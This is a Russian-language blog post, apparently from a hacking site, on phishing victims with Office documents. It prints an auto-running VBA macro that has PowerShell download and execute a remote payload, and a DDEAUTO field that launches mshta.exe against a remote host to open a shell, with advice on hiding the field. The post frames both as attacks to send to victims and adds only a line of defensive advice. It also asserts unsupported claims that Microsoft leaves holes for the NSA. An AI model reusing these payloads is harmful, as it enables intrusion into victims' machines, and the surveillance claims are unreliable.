Old School Macros и особенности DDE

Думаю, каждый из нас наверняка помнит такую составляющую Microsoft Office, как макрос. Возможно, кто-то сразу вспомнит и об OLE. Что это сегодня может нам дать? Ответ прост: VB скрипт помещаем в макрос и отправляем данный документ жертве. Ничего сложного, а приём работает и по наше время. Так что? Поговорим об этом подробнее?

<h2 style=»text-align: left;»>Макросы</h2>

Наверняка многие из вас задавались в своё время вопросом, почему Microsoft не хочет отключать данные функции? Я уже писал раннее, что это все делается для АНБ и других структур, чтобы им проще было в своей работе. Windows, Office, IE, MSE и многое другое содержат дыры, а когда White Hat придают найденным уязвимостям огласку, они закрываются с релизом новой версии, а другие появляются. А все потому, что Windows самая популярная ОС среди рядовых пользователей. Если вы в курсе, то Win 10 раздает данные о вас примерно на 50 адресов серверов MS. Так что можно легко сделать вывод, что тотальная слежка уже давно ведется за всеми нами. Скорее, конечно, это 3 мировая информационная война, но суть вы уяснили))) Берегите близких, предупреждайте их.

А теперь ближе к делу…

Здесь указаны настройки по умолчанию. Забавно, не так ли? А чтобы их найти, это еще надо покапаться, а рядовому пользователю это вообще тяжело. А значит пользователь в 80% случаев клацнет по всплывающему окну. Специально скачал 2016 офис для этой статьи.

Думаю, эта картинка знакома всем, правда?

А после клика появляется шелл, можно делать все, что захотим =)) Причем специально сделал разные подсети 192.168.1.0 и 10.0.2.0 Тут не важно откуда жертва получит файл, из внешней сети или локалки. Хотя макрос совершенно обычный.

Sub Auto_Open()

Dim exec As String

exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://rgho.st/private/6HV4lXWb6/c88987117ccd2e4b9c639a10da043804/payload.txt '))"""

Shell (exec)

End Sub

Sub AutoOpen()

   Auto_Open

End Sub

Sub Workbook_Open()

   Auto_Open

End Sub

Сама суть данного подхода — сгенерировать шел, залить его на обменник и заставить жертву его скачать. А функция автозапуска сделает все остальное. Естественно, для таких вещей надо создавать документ с поддержкой макросов, а это уже бросается в глаза.

В видео ниже покажу более наглядно. Ладно, хватит про макросы.

<h2 style=»text-align: left;»>DDE</h2>

Функция Microsoft Dynamic Data Exchange (DDE) на самом деле не новая. И ее использовали довольно часто на моей памяти. Не скажу, что для плохих целей, а скорее для удобства работы. Эта функция помогает подгружать данные из одного приложения Office в другое. Картинки из презентации автоматом могут подгружаться в документ ворд для отчета. Довольно удобно и те, кто этим часто пользуется даже не парится о предупреждениях. А вот и зря…

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.1.12:8080/ZW8yLYaXnHlRN"

Вот такой обычный код, вставленный в документ, открывает шелл 🙂 И мы снова можем наблюдать картинку )))

Самое приятное в этом коде, что идет обфускация и выводится запись запуска MS Word. Я не скрывала формулу, ее можно запихнуть в конец документа и видно не будет. Это вовсе не проблема =) А кто раньше использовал уже DDE, сталкивался с проблемой, что выскакивает табличка с надписью cmd.exe, что безусловно напрягает =)

Стандартная формула вызова калькулятора -> без обфускации и т.п.

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

Не знаю как вас, но меня бы сразу напрягла команда, которая содержит cmd.exe ))

Кстати, DDE пашет и в Outlook ))) Так что эксперементируйте и получайте удовольствие ))

Как итог: макросы отключаем вот так! Чтобы никаких уведомлений не было.

А DDE даже не используйте без крайней необходимости. Если сразу нажать отмену, команда не запустится.

В видео будет маленький бонус ) для облегчения написания шелов в DDE.

На сегодня всё 😉